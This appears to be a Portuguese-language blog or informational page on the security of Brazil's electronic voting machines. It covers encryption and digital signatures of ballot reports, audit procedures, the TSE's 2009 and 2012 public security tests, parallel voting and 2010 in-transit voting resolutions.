O boletim de urna é criptografado de forma segmentada, assinado digitalmente e transmitido.
Além da criptografia, existe a decriptografia que é o processo pelo qual são recuperados os dados previamente criptografados, isto é, eles são “desembaralhados”. É um mecanismo de segurança para o funcionamento dos programas computacionais.
No recebimento do boletim de urna ocorrem:
– Validação da compatibilidade da chave pública de assinatura digital do boletim de urna com a chave privada do Totalizador;
– Decriptografia do boletim de urna de forma segmentada;
– Leitura do boletim de urna decriptografado;
– Armazenamento do boletim de urna criptografado e decriptografado.
Segurança em camadas
A segurança do sistema eletrônico de votação é feita em camadas. Por meio de dispositivos de segurança de tipos e com finalidades diferentes, são criadas diversas barreiras que, em conjunto, não permitem que alguém ataque o sistema como um todo. Em resumo, qualquer ataque ao sistema causa um efeito dominó e a urna eletrônica trava, não sendo possível gerar resultados válidos.
Segurança do processo
O processo eletrônico de votação possui vários mecanismos de segurança: assinatura digital, criptografia, resumo digital (hash) e a tabela de correspondência de todas as urnas utilizadas.
Auditoria
É possível realizar auditoria do processo eleitoral sob diversos aspectos, a saber:
A partir da identificação dos locais a serem auditados e da apresentação de pedido fundamentado, os seguintes procedimentos são de possível execução:
– Verificação do resumo digital (hash);
– Reimpressão do boletim de urna;
– Comparação entre o boletim impresso e o boletim recebido pelo sistema de totalização;
– Verificação de assinatura digital;
– Comparação dos relatórios e atas das seções eleitorais com os arquivos digitais da urna;
– Auditoria do código-fonte lacrado e armazenado no cofre do TSE;
– Recontagem dos votos por meio do Registro Digital do Voto (RDV);
– Comparação da recontagem do RDV com o boletim de urna.
Auditorias
Ao longo dos 12 anos de utilização do sistema informatizado de voto, várias auditorias e perícias já foram realizadas. Em 2002, a Unicamp concluiu que “o sistema eletrônico de votação atende às exigências fundamentais do processo eleitoral, ou seja, o respeito à expressão do voto do eleitor e a garantia do seu sigilo”.
Em 2008, a Polícia Federal, no laudo técnico sobre as eleições municipais de 2008 em Caxias (MA), descartou todas as suspeitas de fraude nas urnas eletrônicas.
No mesmo ano, o TSE contratou a Fundação de Apoio à Capacitação em Tecnologia da Informação (FACT), com aprovação do Centro de Tecnologia da Informação Renato Archer, para a prestação de serviços especializados de suporte na especificação de programas a serem aplicados no sistema eletrônico de votação brasileiro, com foco na melhoria da segurança e na redução dos custos.
O objetivo do TSE com a contratação de especialistas é garantir à urna características ergonômicas, de interferência eletromagnética, de estabilidade e confiabilidade do hardware e de economia na compra de plataformas cada vez mais adequadas.
Testes de segurança
Com o objetivo de contribuir para o aperfeiçoamento do software e/ou do hardware da urna eletrônica, demonstrando a transparência do sistema, o TSE já realizou duas edições dos Testes Públicos de Segurança do Sistema Eletrônico de Votação, em que investigadores inscritos apresentaram e executaram planos de “ataque” aos componentes externos e internos da urna.
Em ambas oportunidades foram selecionadas, por comissão avaliadora composta por acadêmicos e cientistas, as melhores propostas de ataque que puderam contribuir para o aprimoramento da segurança e da confiabilidade do sistema eletrônico de votação.
A primeira edição foi realizada entre 10 e 13 de novembro de 2009. Nenhum dos testes conseguiu violar a urna e os programas colocados à prova. No entanto, as ideias apresentadas pelos especialistas contribuíram para o aperfeiçoamento tecnológico da votação.
Nos testes de 2009, foram premiados os seguintes especialistas: 1º lugar – Sérgio Freitas da Silva, 2º lugar – Fernando Andrade Martins de Araújo e equipe da Controladoria-Geral da União e 3º lugar – Antonio Gil Borges de Barros e equipe da Cáritas Informática.
Sérgio, que foi premiado com R$ 5 mil, tentou violar o sigilo do voto por meio da captação de ondas eletromagnéticas emitidas pelas teclas da urna durante a digitação.
Em segundo lugar, foi premiado com R$ 3 mil o grupo de técnicos da CGU (Controladoria Geral da União), que analisou procedimentos relativos à preparação do pleito e apresentou diversas sugestões ao TSE.
Em terceiro lugar, com prêmio de R$ 2 mil, ficou a equipe da empresa Cáritas Informática, que testou tanto procedimentos de preparação do pleito quanto a urna e os softwares de votação.
Já a segunda edição dos testes foi realizada de 20 a 22 de março de 2012, sendo que os investigadores puderam participar de uma fase de preparação, na qual tiveram acesso ao código-fonte da urna eletrônica e puderam se inteirar ainda mais sobre as peculiaridades do sistema.
Os três grupos de investigadores que apresentaram as três melhores contribuições na segunda edição dos testes receberam certificados.
O segundo e terceiro colocados não obtiveram sucesso nos testes propostos, mas apontaram contribuições de aprimoramento do sistema. Em segundo lugar ficou o grupo da Universidade Federal de Uberlândia, que tentou inicializar a urna com um sistema operacional diferente do desenvolvido pela Justiça Eleitoral e recuperar dados da memória da urna eletrônica por meio do uso de spray congelante.
O terceiro colocado foi o grupo do Instituto Sapientia. O desafio deste grupo era clonar um cartão de memória com os dados de votação da urna eletrônica.
Votação Paralela
A votação paralela é uma auditoria que ocorre no dia das eleições e para a qual são convidados fiscais de partidos políticos e coligações, representantes da Ordem dos Advogados do Brasil, bem como entidades representativas da sociedade. É realizada em local designado pelos tribunais regionais eleitorais, após o sorteio de duas a quatro urnas eletrônicas na véspera da eleição. Simultaneamente à votação oficial é apresentada auditoria de verificação do funcionamento das urnas eletrônicas.
Antes da eleição, no mínimo 500 cédulas de votação são entregues aos representantes dos partidos políticos que participarão do evento e preenchidas por eles. Em seguida, as cédulas são colocadas em urnas de lona lacradas. A Comissão de Votação Paralela, instituída previamente, deve se preparar para a possibilidade de os partidos não entregarem a quantidade necessária de cédulas para o procedimento, acertando com alguma escola ou entidade o preenchimento das mesmas, já que, em hipótese alguma, as cédulas devem ser preenchidas por servidores da Justiça Eleitoral.
Simultaneamente à eleição oficial ocorre o processo de votação paralela, que funciona da seguinte forma: os participantes recolhem uma cédula da urna de lona lacrada, revelam aos fiscais e demais presentes os candidatos escolhidos e, em seguida, digitam os números correspondentes no Sistema de Apoio à Votação Paralela e na urna eletrônica. Todo o processo é fiscalizado e filmado.
A fiscalização da votação paralela ocorre por meio de:
Voto em Trânsito
Em 2010 o voto em trânsito foi implementado, possibilitando ao eleitor exercitar seu direito de voto, mesmo não estando em seu domicílio eleitoral. Embora fique esse direito limitado às Eleições Gerais e apenas nas capitais dos Estados. Segue abaixo as resoluções de 2010 sobre o tema em questão:
Resolução TRE nº 23.215, de 02.03.2010. Dispõe sobre o voto em trânsito na eleição presidencial de 2010. Alterada pela Resolução TSE nº 23.322, de 19.8.2010.
Art. 4º Os eleitores habilitados para votar em trânsito terão seus nomes excluídos da urna eletrônica, passando a constar, exclusivamente, da urna das seções especialmente instaladas para este fim.
Parágrafo único. Os nomes dos eleitores habilitados em trânsito serão identificados no caderno de votação da seção de origem, com a indicação de que se habilitaram para votar em uma capital.
Art. 5º O eleitor que não comparecer à seção para votar em trânsito deverá justificar a sua ausência em qualquer Mesa Receptora de Justificativas, inclusive no seu domicílio eleitoral de origem, à exceção da capital do Estado por ele indicada no requerimento de habilitação.
Parágrafo único. O eleitor habilitado para votar em trânsito que comparecer, no dia da votação, à sua seção eleitoral de origem será informado pelo Presidente da Mesa sobre a impossibilidade de votar e a necessidade de realizar a justificação na forma prevista no caput.
Art. 6º Caberá aos Tribunais Regionais Eleitorais cadastrar, em aplicativo desenvolvido pelo Tribunal Superior Eleitoral, as seções especiais e os locais, nas respectivas capitais dos Estados, onde serão instaladas urnas para a recepção dos votos dos eleitores em trânsito, denominadas “Mesas Receptoras de Voto em Trânsito”.
Art. 12. Os Tribunais Regionais Eleitorais que constituírem seções especiais para o voto em trânsito deverão incluir as urnas eletrônicas destinadas a esse fim no quantitativo de urnas a serem submetidas a sorteio para a verificação por meio de votação paralela.
Resolução TRE nº 844, de 29.7.2010. Designa a Zona Eleitoral e o local onde será instalada seção especial destinada à recepção do voto em trânsito, nas eleições de 2010 (Resolução nº 23.215/2010 do TSE).
“CONSIDERANDO que, nas eleições de 2010, os eleitores em trânsito no território nacional poderão votar, no primeiro e/ou segundo turnos, para Presidente e Vice-Presidente da República, em urnas especialmente instaladas nas capitais dos Estados (Código Eleitoral, art. 233-A, e Resolução nº
23.215/2010, art. 1º);”
“Art. 3º Caberá ao Tribunal Superior Eleitoral totalizar os votos recebidos das Mesas Receptoras de
Voto em Trânsito de todas as capitais (Resolução nº 23.215/2010, art. 11).”
Fonte: http://www.justicaeleitoral.jus.br/arquivos/tre-mg-funcionamento-urna
Fonte: http://www.devmedia.com.br/comandos-importantes-linux/23893
You must be logged in to post a comment.